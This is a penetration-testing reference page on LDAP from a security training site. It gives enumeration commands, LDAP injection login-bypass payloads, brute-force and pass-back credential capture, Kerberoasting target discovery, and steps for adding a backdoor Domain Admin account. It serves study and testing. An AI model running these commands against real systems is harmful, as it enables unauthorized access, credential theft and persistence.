Skip to main content

Want to Practice These Techniques?

Try Hackviser's interactive cyber security upskilling platform - Learn by doing!

Start Practicing Now

LDAP (Lightweight Directory Access Protocol)

Default Ports: 389 (LDAP), 636 (LDAPS), 3268 (Global Catalog)

Lightweight Directory Access Protocol (LDAP) is an open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over an IP network. LDAP is commonly used for user authentication, authorization, and storing organizational information. Microsoft's Active Directory is built on LDAP. LDAP directories store information hierarchically in a tree structure.

Connect

Using ldapsearch

Use ldapsearch for querying LDAP directories and extracting information.

Basic LDAP Queries

# Anonymous bind (no authentication)
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com"

# With credentials
ldapsearch -x -H ldap://target.com -D "cn=admin,dc=example,dc=com" -w password -b "dc=example,dc=com"

# LDAPS (SSL/TLS)
ldapsearch -x -H ldaps://target.com:636 -D "cn=admin,dc=example,dc=com" -w password -b "dc=example,dc=com"

Advanced LDAP Searches

# Search specific object class
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(objectClass=person)"

# Get all attributes
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "*"

Using ldapwhoami

Use ldapwhoami to test LDAP authentication and identify current user context.

# Test authentication
ldapwhoami -x -H ldap://target.com -D "cn=admin,dc=example,dc=com" -w password

# Anonymous bind
ldapwhoami -x -H ldap://target.com

Using ldapadd/ldapmodify

Use LDAP modification tools to add, modify, and delete directory entries.

# Add new entry
ldapadd -x -H ldap://target.com -D "cn=admin,dc=example,dc=com" -w password -f new_entry.ldif

# Modify entry
ldapmodify -x -H ldap://target.com -D "cn=admin,dc=example,dc=com" -w password -f modify.ldif

# Delete entry
ldapdelete -x -H ldap://target.com -D "cn=admin,dc=example,dc=com" -w password "cn=user,ou=users,dc=example,dc=com"

Using Python (ldap3)

Use Python ldap3 library for programmatic LDAP access and automation.

from ldap3 import Server, Connection, ALL

server = Server('target.com', get_info=ALL)
conn = Connection(server, 'cn=admin,dc=example,dc=com', 'password', auto_bind=True)

# Search
conn.search('dc=example,dc=com', '(objectClass=person)')
for entry in conn.entries:
    print(entry)

conn.unbind()

Recon

Service Detection with Nmap

Use Nmap to detect LDAP services and identify server capabilities.

nmap -p 389,636,3268 target.com

Identify LDAP server software and version through banner grabbing.

Using netcat

# Using netcat
nc -vn target.com 389

Using nmap

# Using nmap
nmap -p 389 -sV --script ldap-rootdse target.com

Using ldapsearch

# Get root DSE
ldapsearch -x -H ldap://target.com -b "" -s base "(objectclass=*)"

Rootdse Information

Extract detailed server information from LDAP root DSE.

Basic Root DSE Queries

# Get naming contexts
ldapsearch -x -H ldap://target.com -b "" -s base "(objectclass=*)" namingContexts

# Get all rootDSE attributes
ldapsearch -x -H ldap://target.com -b "" -s base "(objectclass=*)" "*" "+"

Important Root DSE Attributes

# Important attributes to check:
# - namingContexts (base DNs)
# - defaultNamingContext (primary domain)
# - supportedLDAPVersion
# - supportedSASLMechanisms
# - dnsHostName

Enumeration

Domain Information

Querying domain objects reveals organizational structure, forest information, and domain functional levels.

# Get domain info
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(objectClass=domain)"

# Get naming contexts
ldapsearch -x -H ldap://target.com -b "" -s base namingContexts

# Forest information
ldapsearch -x -H ldap://target.com -b "" -s base forestFunctionality

User Enumeration

LDAP directories contain detailed user information including email addresses, phone numbers, group memberships, and account status.

Basic User Queries

# List all users
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(objectClass=person)"

# Users with specific attributes
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(objectClass=user)" cn mail

# Active Directory users
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(objectClass=user)" sAMAccountName

Advanced User Queries

# Users with passwords never expire
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(userAccountControl:1.2.840.113556.1.4.803:=65536)"

# Service accounts
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(&(objectClass=user)(servicePrincipalName=*))"

Group Enumeration

Group information reveals organizational structure and helps identify privileged users like Domain Admins.

# List all groups
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(objectClass=group)" cn

# Domain Admins
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(cn=Domain Admins)" member

# All admin groups
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(&(objectClass=group)(cn=*admin*))" cn member

# Group members
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(cn=Administrators)" member

Computer Enumeration

Enumerate computer objects and domain controllers in the LDAP directory.

# List computers
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(objectClass=computer)" cn

# Domain controllers
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(userAccountControl:1.2.840.113556.1.4.803:=8192)" dNSHostName

# Operating systems
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(objectClass=computer)" operatingSystem operatingSystemVersion

Attribute Enumeration

Extract specific attributes that may contain sensitive information or useful data.

Contact Information Extraction

# Extract email addresses
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(mail=*)" mail

# Extract phone numbers
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(telephoneNumber=*)" telephoneNumber

Sensitive Attribute Queries

# User descriptions (may contain passwords)
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(description=*)" description

# Service Principal Names (SPNs)
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(servicePrincipalName=*)" servicePrincipalName

Attack Vectors

Anonymous Bind

Anonymous bind allows unauthenticated access to LDAP directories, potentially exposing sensitive organizational information.

# Test anonymous access
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(objectClass=*)"

# If successful, enumerate everything
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(objectClass=user)"
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(objectClass=group)"

Null Bind

Null bind attempts to authenticate with empty credentials, which may still reveal directory information.

# Bind with empty credentials
ldapsearch -x -H ldap://target.com -D "" -w "" -b "dc=example,dc=com"

# May reveal information even with null credentials

LDAP Injection

LDAP injection attacks manipulate LDAP queries to bypass authentication or extract unauthorized information.

Basic Injection Payloads

# In login forms using LDAP
# Normal query: (&(uid=username)(password=pass))

# Injection payloads
username: admin)(&(|
password: any

# Results in: (&(uid=admin)(&(|)(password=any))
# Always true condition

Advanced Injection Techniques

# Wildcard injection
username: *
password: *

# OR injection
username: *)(uid=*))(|(uid=*
password: any

# Comment injection
username: admin)(cn=*))%00
password: any

Brute Force

Brute forcing LDAP credentials can reveal weak passwords on directory services.

Using Hydra

hydra -L users.txt -P passwords.txt target.com ldap2 -s 389

Using Nmap

nmap -p 389 --script ldap-brute --script-args ldap.base='"dc=example,dc=com"' target.com

Using Metasploit

use auxiliary/scanner/ldap/ldap_login
set RHOSTS target.com
set USERNAME admin
set PASS_FILE passwords.txt
run

Pass-Back Attack

Pass-back attacks redirect LDAP authentication to attacker-controlled servers to capture credentials.

# If you can modify LDAP server settings
# Change LDAP server IP to attacker's server

# Setup rogue LDAP server
sudo responder -I eth0

# Or use simple LDAP logger
sudo nc -lvnp 389

# Device will send credentials to attacker's server

Post-Exploitation

Extract All Users

Extract comprehensive user information for analysis and further exploitation.

Complete User Dump

# Complete user dump with all attributes
ldapsearch -x -H ldap://target.com \
  -D "cn=admin,dc=example,dc=com" -w password \
  -b "dc=example,dc=com" \
  "(objectClass=user)" \
  "*" "+" > all_users.ldif

# Parse for passwords in description
grep -i "description:" all_users.ldif | grep -i "pass\|pwd"

Targeted User Extraction

# Extract specific attributes
ldapsearch -x -H ldap://target.com \
  -D "cn=admin,dc=example,dc=com" -w password \
  -b "dc=example,dc=com" \
  "(objectClass=user)" \
  sAMAccountName mail userAccountControl

Kerberoasting Targets

Identify service accounts with SPNs for Kerberoasting attacks.

# Find SPNs (Service Principal Names)
ldapsearch -x -H ldap://target.com \
  -D "cn=admin,dc=example,dc=com" -w password \
  -b "dc=example,dc=com" \
  "(&(objectClass=user)(servicePrincipalName=*))" \
  sAMAccountName servicePrincipalName

# Request service tickets
# Then crack offline with hashcat

ASREPRoasting Targets

Identify users vulnerable to ASREPRoasting attacks.

# Find users with "Do not require Kerberos preauthentication"
ldapsearch -x -H ldap://target.com \
  -D "cn=admin,dc=example,dc=com" -w password \
  -b "dc=example,dc=com" \
  "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" \
  sAMAccountName

Sensitive Attribute Extraction

Search for sensitive information stored in user attributes.

Password Hunting

# Look for passwords in attributes
ldapsearch -x -H ldap://target.com \
  -D "cn=admin,dc=example,dc=com" -w password \
  -b "dc=example,dc=com" \
  "(description=*)" description | grep -i "pass\|pwd\|secret"

Additional Attribute Searches

# Check info field
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(info=*)" info

# Comment field
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(comment=*)" comment

Privilege Escalation

Escalate privileges by modifying group memberships and user permissions.

# Add user to admin group
cat > add_admin.ldif << EOF
dn: cn=Domain Admins,cn=Users,dc=example,dc=com
changetype: modify
add: member
member: cn=backdoor_user,cn=Users,dc=example,dc=com
EOF

ldapmodify -x -H ldap://target.com \
  -D "cn=admin,dc=example,dc=com" -w password \
  -f add_admin.ldif

Persistence

Establish persistent access by creating backdoor accounts and maintaining access.

# Create backdoor user
cat > backdoor.ldif << EOF
dn: cn=System Service,cn=Users,dc=example,dc=com
changetype: add
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: System Service
sAMAccountName: svc_system
userPrincipalName: svc_system@example.com
userPassword: P@ssw0rd123!
EOF

ldapadd -x -H ldap://target.com \
  -D "cn=admin,dc=example,dc=com" -w password \
  -f backdoor.ldif

# Add to Domain Admins (as shown above)

Common LDAP Queries

# All users
(objectClass=user)

# All groups
(objectClass=group)

# All computers
(objectClass=computer)

# Domain Admins
(cn=Domain Admins)

# Users with SPNs
(&(objectClass=user)(servicePrincipalName=*))

# Disabled accounts
(userAccountControl:1.2.840.113556.1.4.803:=2)

# Accounts that never expire
(userAccountControl:1.2.840.113556.1.4.803:=65536)

# Locked accounts
(lockoutTime>=1)

LDAP Filter Examples

# AND operator
(&(objectClass=user)(cn=admin))

# OR operator  
(|(cn=admin)(cn=user))

# NOT operator
(!(cn=guest))

# Wildcard
(cn=admin*)
(cn=*admin*)

# Present
(mail=*)

# Greater than
(badPwdCount>=3)

Useful Tools

ToolDescriptionPrimary Use Case
ldapsearchLDAP search toolQuerying LDAP
ldapmodifyLDAP modification toolModifying entries
JXplorerLDAP GUI browserVisual exploration
Apache Directory StudioLDAP IDEComplete management
ldapdomaindumpAD info dumperDomain enumeration
windapsearchAD enumerationPowerShell-less enum
enum4linuxSMB/LDAP enumeratorLinux-based enum
MetasploitExploitation frameworkAutomated testing

Security Misconfigurations

  • ❌ Anonymous bind allowed
  • ❌ Null bind permitted
  • ❌ Weak admin passwords
  • ❌ LDAP injection vulnerabilities
  • ❌ No SSL/TLS (using port 389)
  • ❌ Excessive permissions granted
  • ❌ Sensitive data in attributes
  • ❌ No access controls
  • ❌ Verbose error messages
  • ❌ Default configurations
  • ❌ No logging enabled
  • ❌ Outdated LDAP server